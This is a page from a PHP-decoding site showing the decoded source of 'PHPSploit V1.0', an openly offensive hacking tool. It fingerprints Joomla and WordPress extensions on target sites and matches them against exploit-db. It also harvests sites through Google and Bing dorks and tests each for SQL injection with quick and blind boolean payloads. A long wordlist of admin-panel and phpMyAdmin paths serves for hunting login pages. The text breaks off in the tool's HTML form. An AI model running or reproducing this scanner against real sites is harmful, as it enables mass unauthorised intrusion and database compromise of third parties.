Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? # PHPSploit V1.0 # Coded By Stalk3R # For Sec4Ever.Com eval(gzinflate(str_rot1..
Decoded Output download
?>
<?php
set_time_limit(0);
error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');
if(@$_GET['webvuln'])
{
//lagripp code
function ask_exploit_db($component){ //
$ExPloiTdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
$result = @file_get_contents($ExPloiTdb);
if (@eregi("No results",$result)) {
echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
}else{
echo"<td><a href='$ExPloiTdb'>Found ..!</a></td><td><--</td></tr>";
}
}
/**************************************************************/
function get_components($site1){ //
$source = @file_get_contents($site1);
preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);
$arz=array_merge($f2[1],$f[1],$f3[1]);
$coms=array();
if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
foreach(array_unique($arz) as $x){
$coms[]=$x;
}
foreach($coms as $comm){
echo "<tr><td>$comm</td>";
ask_exploit_db($comm);
}
}
/**************************************************************/
function get_plugins($site1){ //
$source = @file_get_contents($site1);
preg_match_all("#/plugins/(.*?)/#i", $source, $f);
$plugins=array_unique($f[1]);
if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
foreach($plugins as $plugin){
echo "<tr><td>$plugin</td>";
ask_exploit_db($plugin);
}
}
/**************************************************************/
function t_header($site1){ //
echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';
echo'
<tr id="oo">
<td>Site : <a href="'.$site1.'">'.$site1.'</a></td>
<td>Exploit-db</b></td>
<td>Exploit it !</td>
</tr>
';
}
//--------------fin gripp
// Party vulnerability
$site1=strip_tags(trim($_GET['webvuln']));
t_header($site1);
$url_to_change = $site1;
$www = 'www';
$position = strpos($url_to_change, $www);
if ($position === false) {
$site1 = str_replace("".$site1."", "www.".$site1."", $site1);
} else
{
echo '';
}
if($_GET['what'] == 'joomla')
{
echo get_components("http://".$site1);
}
elseif($_GET['what'] == 'wordpress')
{
echo get_plugins("http://".$site1);
}
}
elseif($_GET['dork'])
{
//////////////// ICI POUR LES SITE SIMPLE SQLi seulement pour l'instant
?>
<?php
/* Google dork scanner
* yepss... you know what this is
*
*/
@error_reporting(0);
@set_time_limit(60);
function fetch($url) {
if(!function_exists("curl_init")){
$bu = trim(@file_get_contents($url));
if($bu == "") return "";
else return $bu;
}
$header[] = "Accept-Language: en";
$header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3";
$header[] = "Connection: Keep-Alive";
$header[] = "Pragma: no-cache";
$header[] = "Cache-Control: no-cache";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE );
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$content = curl_exec($ch);
curl_close($ch);
return $content;
}
function sqlcheck($url_){
// clean url
$url_ = "http://".trim(str_ireplace("http://","",$url_));
$url_ = str_ireplace("&","&",$url_);
$urls = explode("?",$url_);
// check if url contains querystring
if(count($urls)==2){
$url = $urls[0];
$querys = explode("&",$urls[1]);
foreach($querys as $query){
$vars = explode("=",$query);
//echo $query;
// check if parameter has a numeric value
if((count($vars)>=2) && (is_numeric($vars[1]))){
$final = str_replace($query,$query."%27",$url_);
//echo $final;
$content = fetch($final);
$url_1 = file_get_contents($url_);
$url_2 = file_get_contents($final);
if(preg_match("/sql syntax|sql error|right syntax to use near|Warning|SQL|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content) OR ($url_1 !== $url_2)){
return $vars[0];
}
}
}
}
return ""; // gagal son
}
function sqlheavycheck($url_){
// clean url
$url_ = "http://".trim(str_ireplace("http://","",$url_));
$url_ = str_ireplace("&","&",$url_);
// check if url contains querystring
$pos = stripos($url_,"?");
if($pos !== false){
$url = substr($url_,0,$pos);
$que = substr($url_,$pos+1);
$querys = explode("&",$que);
foreach($querys as $query){
$vars = explode("=",$query);
//echo $query;
// check if parameter has a numeric value
if((count($vars)>=2) && (is_numeric($vars[1]))){
// and 1=(select 1)
$acak = rand(1111,9999);
$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
$contrue = fetch($final);
//echo "final1 : ".$final."<br />";
// and 1=(select 0)
$acak = rand(1111,9999);
$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
//echo "final2 : ".$final."<br />";
$confalse = fetch($final);
$numtrue = strlen(strip_tags($contrue));
$numfalse = strlen(strip_tags($confalse));
$selisih = $numtrue - $numfalse;
if($selisih >= 30){
return $vars[0];
}
else{
//' and 1=(select 1) and '1'='1
$acak = rand(1111,9999);
$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
$contrue = fetch($final);
//echo "final1 : ".$final."<br />";
//' and 1=(select 0) and '1'='1
$acak = rand(1111,9999);
$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
//echo "final2 : ".$final."<br />";
$confalse = fetch($final);
$numtrue = strlen(strip_tags($contrue));
$numfalse = strlen(strip_tags($confalse));
$selisih = $numtrue - $numfalse;
if($selisih >= 30){
return $vars[0];
}
}
}
}
}
return ""; // gagal son...
}
// debugging tools
if(isset($_GET['check'])&&($_GET['check']!="")){
$url = $_GET['check'];
echo $url." ".sqlcheck($url);
die();
}
if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){
$url = $_GET['heavycheck'];
echo $url." ".sqlheavycheck($url);
die();
}
// debugging tools end
if(isset($_GET['dork'])&&($_GET['dork']!="")){
$gnum = 10; // jumlah hasil pencarian perhalaman
$setype = "google"; // default cari pakek g00gle
if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));
if(isset($_GET['page'])){
$gpage = (int) $_GET['page'];
if($gpage < 1) $gpage = 1;
}
else $gpage = 1;
$gpage = ($gpage - 1) * $gnum;
if($gpage > ($gpage * $gnum)){
echo "_finish_|max only ".$gpage." results";
die();
}
$dork = stripslashes($_GET['dork']);
$dorkg = "site:".urldecode($dork)." filetype:php";
$dorkb = urldecode("site:".$dork."+php");
$dorkb = str_replace(" ","+",$dorkb);
if($setype == "google"){
for($i=1; $i<3; $i++)
{
$gsearch = fetch("http://www.google.com/search?hl=fr&q=" . urlencode($dorkg) . "&start=$gpage");
$raws = explode("<h3 class=\"r\">",$gsearch);
if((trim($gsearch) == "") || (count($raws) <= 1) || !(preg_match('/<h3 class="r"><a href="(.*?)"/si',$gsearch))){
echo "<font color=#ff0000>[X] ".$setype."</font>";
die();
}
}
}
elseif($setype == "bing"){
for($i=1; $i<3; $i++)
{
$dork = preg_replace("/^[^:]*:(.*)/i","",$dorkb);
$gsearch = fetch("http://www.bing.com/search?q=".$dorkb."&filt=all&first=".$gpage."&FORM=PERE3");
$raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch);
if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){
echo "<font color=#ff0000>[X] ".$setype."</font>";
die();
}
}
}
else{
echo "Search engine not supported";
die();
}
foreach($raws as $korban){
if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){
$heavy = false;
if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true;
$calon = substr($korban,9);
$pos = strpos($calon,"\"");
if($pos !== false){
$url = trim(substr($calon,0,$pos));
if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue;
if(!preg_match("/\w+=\d+/i",$url)) continue;
if($heavy) {
$vulnvar = sqlheavycheck($url);
if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
echo $laporan;
}
else{
$vulnvar = sqlcheck($url);
if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
echo $laporan;
}
}
}
}
die(); // mas kamu koq looyo...
}
}
else
{
$list['front'] ="admin
team
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$list['end'] = "admin1.php
team
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
upload.php
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpMyAdmin/
phpmyadmin/
PMA/
admin/
dbadmin/
mysql/
myadmin/
phpmyadmin2/
phpMyAdmin2/
phpMyAdmin-2/
php-my-admin/
weMeanYouNoHarm/
V20xRmRRPT0K/
admin/pma/
admin/phpmyadmin/
db/
myadmin/
mysql/
mysqladmin/
typo3/phpmyadmin/
phpadmin/
phpmyadmin1/
web/phpMyAdmin/
xampp/phpmyadmin/
web/
php-my-admin/
websql/
phpMyAdmin-2/
php-my-admin/
phpMyAdmin-2.8.2.1/
phpMyAdmin-2.8.2.2/
phpMyAdmin-2.8.2.3/
phpMyAdmin-2.8.2.4/
phpMyAdmin-2.10.0.0/
phpMyAdmin-2.10.0.1/
phpMyAdmin-2.10.0.2/
phpMyAdmin-2.10.1.0/
phpMyAdmin-2.10.2.0/
phpMyAdmin-2.11.0.0/
phpMyAdmin-2.11.1.0/
phpMyAdmin-2.11.1.1/
phpMyAdmin-2.11.1.2/
phpMyAdmin-2.11.2.0/
phpMyAdmin-2.11.2.1/
phpMyAdmin-2.11.2.2/
phpMyAdmin-2.11.3.0/
phpMyAdmin-2.11.4.0/
phpMyAdmin-2.11.5.0/
phpMyAdmin-2.11.5.1/
phpMyAdmin-2.11.5.2/
phpMyAdmin-2.11.6.0/
phpMyAdmin-2.11.7.0/
phpMyAdmin-2.11.7.1/
phpMyAdmin-2.11.8.0/
phpMyAdmin-2.11.9.0/
phpMyAdmin-2.11.9.1/
phpMyAdmin-2.11.9.2/
phpMyAdmin-2.11.9.3/
phpMyAdmin-2.11.9.4/
phpMyAdmin-3.0.0.0/
phpMyAdmin-3.0.1.0/
phpMyAdmin-3.0.1.1/
phpMyAdmin-3.0.2.0/
phpMyAdmin-3.1.0.0/
phpMyAdmin-3.1.1.0/
phpMyAdmin-3.1.2.0/
phpMyAdmin-3.1.3.0/
phpMyAdmin-2.9.0-rc1/
phpMyAdmin-2.9.0/
phpMyAdmin-2.9.0.1/
phpMyAdmin-2.9.0.2/
phpMyAdmin-2.9.1/
phpMyAdmin-2.9.2/
phpMyAdmin-3.4.3.1-all-languages/
phpMyAdmin-3.4.3.1-english/
phpMyAdmin-3.4.3.1/
sqlmanager/
mysqlmanager/
p/m/a/
PMA2005/
pma2005/
pma2006/
pma2007/
pma2008/
pma2009/
phpmanager/
php-myadmin/
phpmy-admin/
webadmin/
sqlweb/
websql/
webdb/
mysqladmin/
mysql-admin/
databaseadmin/
admm/
admn/
w00tw00t.at.blackhats.romanian.anti-sec:)/
phpMyAdmin/scripts/setup.php/
phpmyadmin/scripts/setup.php/
pma/scripts/setup.php/
myadmin/scripts/setup.php/
MyAdmin/scripts/setup.php/
phpmyadmin/scripts/setup.php/
phpMyAdmin/scripts/setup.php/
phpMyAdmin-2.2.3/
phpMyAdmin-2.2.6/
phpMyAdmin-2.5.1/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.5-rc1/
phpMyAdmin-2.5.5-rc2/
phpMyAdmin-2.5.5/
phpMyAdmin-2.5.5-pl1/
phpMyAdmin-2.5.6-rc1/
phpMyAdmin-2.5.6-rc2/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.7/
phpMyAdmin-2.5.7-pl1/
phpMyAdmin-2.6.0-alpha/
phpMyAdmin-2.6.0-alpha2/
phpMyAdmin-2.6.0-beta1/
phpMyAdmin-2.6.0-beta2/
phpMyAdmin-2.6.0-rc1/
phpMyAdmin-2.6.0-rc2/
phpMyAdmin-2.6.0-rc3/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.0-pl1/
phpMyAdmin-2.6.0-pl2/
phpMyAdmin-2.6.0-pl3/
phpMyAdmin-2.6.1-rc1/
phpMyAdmin-2.6.1-rc2/
phpMyAdmin-2.6.1/
phpMyAdmin-2.6.1-pl1/
phpMyAdmin-2.6.1-pl2/
phpMyAdmin-2.6.1-pl3/
phpMyAdmin-2.6.2-rc1/
phpMyAdmin-2.6.2-beta1/
phpMyAdmin-2.6.2-rc1/
phpMyAdmin-2.6.2/
phpMyAdmin-2.6.2-pl1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-rc1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-pl1/
phpMyAdmin-2.6.4-rc1/
phpMyAdmin-2.6.4-pl1/
phpMyAdmin-2.6.4-pl2/
phpMyAdmin-2.6.4-pl3/
phpMyAdmin-2.6.4-pl4/
phpMyAdmin-2.6.4/
phpMyAdmin-2.7.0-beta1/
phpMyAdmin-2.7.0-rc1/
phpMyAdmin-2.7.0-pl1/
phpMyAdmin-2.7.0-pl2/
phpMyAdmin-2.7.0/
phpMyAdmin-2.8.0-beta1/
phpMyAdmin-2.8.0-rc1/
phpMyAdmin-2.8.0-rc2/
phpMyAdmin-2.8.0/
phpMyAdmin-2.8.0.1/
phpMyAdmin-2.8.0.2/
phpMyAdmin-2.8.0.3/
phpMyAdmin-2.8.0.4/
phpMyAdmin-2.8.1-rc1/
phpMyAdmin-2.8.1/
phpMyAdmin-2.8.2/
sqlmanager/
mysqlmanager/
p/m/a/
PMA2005/
pma2005/
phpmanager/
php-myadmin/
phpmy-admin/
webadmin/
sqlweb/
websql/
webdb/
mysqladmin/
mysql-admin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html
admin.php
login.htm
login.html
login/
login.php
adm/
admin/
admin/account.html
admin/login.html
admin/login.htm
admin/home.php
admin/controlpanel.html
admin/controlpanel.htm
admin/cp.php
admin/adminLogin.html
admin/adminLogin.htm
admin/admin_login.php
admin/controlpanel.php
admin/admin-login.php
admin-login.php
admin/account.php
admin/admin.php
admin.htm
admin.html
adminitem/
adminitem.php
adminitems/
adminitems.php
administrator/
administrator/login.php
administrator.php
administration/
administration.php
adminLogin/
adminlogin.php
admin_area/admin.php
admin_area/
admin_area/login.php
manager/
manager.php
letmein/
letmein.php
superuser/
superuser.php
access/
access.php
sysadm/
sysadm.php
superman/
supervisor/
panel.php
control/
control.php
member/
member.php
members/
members.php
user/
user.php
cp/
uvpanel/
manage/
manage.php
management/
management.php
signin/
signin.php
log-in/
log-in.php
log_in/
log_in.php
sign_in/
sign_in.php
sign-in/
sign-in.php
users/
users.php
accounts/
accounts.php
wp-login.php
bb-admin/login.php
bb-admin/admin.php
bb-admin/admin.html
administrator/account.php
relogin.htm
relogin.html
check.php
relogin.php
processlogin.php
checklogin.php
checkuser.php
checkadmin.php
isadmin.php
authenticate.php
authentication.php
auth.php
authuser.php
authadmin.php
cp.php
modelsearch/login.php
moderator.php
moderator/
controlpanel/
controlpanel.php
admincontrol.php
adminpanel.php
fileadmin/
fileadmin.php
sysadmin.php
admin1.php
admin1.html
admin1.htm
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
phpmyadmin/
myadmin/
ur-admin.php
ur-admin/
Server.php
Server/
wp-admin/
administr8.php
administr8/
webadmin/
webadmin.php
administratie/
admins/
admins.php
administrivia/
Database_Administration/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
power_user/
system_administration/
ss_vms_admin_sm/
bb-admin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
adm.php
admin_login.php
panel-administracion/login.php
pages/admin/admin-login.php
pages/admin/
acceso.php
admincp/login.php
admincp/
adminarea/
admincontrol/
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
modules/admin/
administrators.php
siteadmin/
siteadmin.php
adminsite/
kpanel/
vorod/
vorod.php
vorud/
vorud.php
adminpanel/
PSUser/
secure/
webmaster/
webmaster.php
autologin.php
userlogin.php
admin_area.php
cmsadmin.php
security/
usr/
root/
secret/
admin/login.php
admin/adminLogin.php
moderator.php
moderator.html
moderator/login.php
moderator/admin.php
yonetici.php
0admin/
0manager/
aadmin/
cgi-bin/login.php
login1.php
login_admin/
login_admin.php
login_out/
login_out.php
login_user.php
loginerror/
loginok/
loginsave/
loginsuper/
loginsuper.php
login.php
logout/
logout.php
secrets/
super1/
super1.php
super_index.php
super_login.php
supermanager.php
superman.php
superuser.php
supervise/
supervise/Login.php
super.php";
function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta **********="Content-Type" *********"text/html; charset=utf-8" />
<title>PHPSploit V1.0 </title>
<style type="text/css">
h1.technique-two {
width: 405px; height: 120px;
margin: 0 auto;
}
body{
background: #070707;
background-image: url("http://www.easy-upload.net/fichiers/stalker-21-stalccccccker-jeux-video.20111184848.jpg");;
margin: 0;
padding: 0;
background-attachment:fixed;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 490px;
border: 1px solid #555;
background: #333;
color: #FFF
}
.red input{
background: #000;
border: 1px solid #555;
color: #FFF;
}
.blue{
float: left;
width: 500px;
border: 1px solid #1d7fc3;
background: #191919;
color: #1d7fc3;
}
.yellow{
position:absolute;
margin-left: 510px;
float: right;
width: 480px;
border: 1px solid #FFBF00;
background: #191919;
color: #FFBF00;
}
.green{
float: left;
width: 490px;
border: 1px solid #5fd419;
background: #191919;
color: #5fd419;
}
input,select,textarea{
border:0;
border:1px solid #900;
color:#fff;
background:#000;
margin:0;
padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
background:#200;
border:1px solid #f00;
}
option{
background:#000;
}
.white{
color:#fff;
}
#status{
width:100%;
height:auto;
padding:4px 0;
border-bottom:1px solid #300;
}
#result a{
color:#777;
}
.sign{
color:#222;
}
#box{
margin:10px 0 0 0;
}
</style>
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
var $this = $text;
var logbox = document.getElementById($place);
if($replace == 0)
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
else
document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>';
?>
<!-- <?php echo date("Y",time()); ?> Revan Aditya -->
<script type="text/javascript">
jalan = false;
nomer = 1;
nomermax = 100;
heavy = false;
function ajax(vars, nom, cbFunction){
var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
var querystring = '?' + vars + '&page=' + nom;
req.open("GET", querystring , true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.onreadystatechange = function(){
if (req.readyState == 4 && req.status == 200){
if (req.responseText){
cbFunction(req.responseText,vars);
}
}
}
req.send(null);
}
function showResult(str, vars){
var box = document.getElementById("result")
if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />';
else box.innerHTML += str;
if(!jalan){
box.innerHTML += '<span class=\"red\">*** </span> paused...<br />';
document.getElementById("loading").style.visibility = 'hidden';
document.getElementById("btnOk").value = "Resume";
}
else {
if(!str.match(/.*finish.*/gi)){
sqlCheck(vars);
}
else{
var pesan = str.substring(str.indexOf("|") + 1);
box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />';
document.getElementById('setype').disabled = false;
document.getElementById('dork').readOnly = false;
document.getElementById("loading").style.visibility = 'hidden';
document.getElementById("btnOk").value = "Search";
nomer = 1;
jalan = false;
}
}
var oldYPos = 0, newYPos = 0;
do{
if (document.all){
oldYPos = document.body.scrollTop;
}
else{
oldYPos = window.pageYOffset;
}
window.scrollBy(0, 50);
if (document.all){
newYPos = document.body.scrollTop;
}
else{
newYPos = window.pageYOffset;
}
} while (oldYPos < newYPos);
}
function keyHandler(ev){
if (!ev){
ev = window.event;
}
if (ev.which){
keycode = ev.which;
}
else if (ev.keyCode){
keycode = ev.keyCode;
}
if (keycode == 13){
sikat();
}
}
String.prototype.trim = function() {
return this.replace(/^\s*|\s*$/g, "");
}
function sqlCheck(xdata){
if(jalan){
ajax(xdata, nomer, showResult);
nomer++;
}
}
function sqlHeavyCheck(xdata){
if(jalan){
ajax(xdata + '&heavy=1', nomer, showResult);
nomer++;
}
}
function sikat(){
var btext = document.getElementById("btnOk");
if((btext.value == 'Search') || (btext.value == 'Resume')){
if(!jalan){
if(btext.value == 'Search') nomer = 1;
var target = document.getElementById('dork');
var setype = document.getElementById('setype');
if(target.value.trim().length>0) {
document.getElementById("loading").style.visibility = 'visible';
document.getElementById("btnOk").value = "Pause";
target.readOnly = true;
setype.disabled = true;
jalan = true;
sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
}
}
else alert("Please stop first...");
}
else {
berhenti();
}
}
function initpg(){
document.onkeypress = keyHandler;
}
function berhenti(){
jalan = false;
}
function bersih(){
var tanya = confirm("Clear results and restart?");
if(tanya == true) location.href = 'adm.php';
}
function checkheavy_fix(){
var heavyval = document.getElementById("heavy");
if(heavyval.checked) heavyval.checked = false;
else heavyval.checked = true;
checkheavy();
}
function checkheavy(){
var heavyval = document.getElementById("heavy").checked;
var box = document.getElementById("result")
if(heavyval) {
heavy = true;
box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />';
}
else {
heavy = false;
box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />';
}
}
</script>
<?php
echo '
</head>
<body>
<br />
<br />
<h1 class="technique-two">
</h1>
<div class="wrapper">
<table><tr><td>
<div class="red">
<div class="tube">
<table width=100% style="background: #222; border: 1px solid #111;"><tr><td align=left><table><tr><td><img src="http://cdn4.iconfinder.com/data/icons/socialmediaicons_v120/32/website.png"></td><td><center><b>WebSite Party</b></center></td></table></table><br>
<form action="" method="post" name="xploit_form">
URL:<br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br />
404 error page:<br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br />
